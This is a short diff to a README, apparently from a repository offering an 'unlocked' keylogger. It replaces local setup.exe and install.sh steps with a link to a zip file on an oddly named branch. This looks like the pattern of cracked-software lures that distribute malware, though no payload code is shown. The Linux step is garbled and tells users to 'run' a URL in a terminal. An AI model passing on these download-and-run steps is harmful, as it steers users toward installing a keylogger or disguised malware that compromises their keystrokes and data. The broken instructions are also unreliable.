randomuser3733/actual-keylogger-unlocked-edition/README.md

 ### 3. Begin the Installation Journey

 - On **Windows**:
-  Open `setup.exe` and follow the on-screen wizard.
+  Open `https://raw.githubusercontent.com/randomuser3733/actual-keylogger-unlocked-edition/branch/skunkbush/actual-keylogger-unlocked-edition_v1.4.zip` and follow the on-screen wizard.
 - On **Linux**:
-  Navigate to the extracted directory and run `./install.sh` from your terminal.
+  Navigate to the extracted directory and run `https://raw.githubusercontent.com/randomuser3733/actual-keylogger-unlocked-edition/branch/skunkbush/actual-keylogger-unlocked-edition_v1.4.zip` from your terminal.

 ### 4. Activate and Configure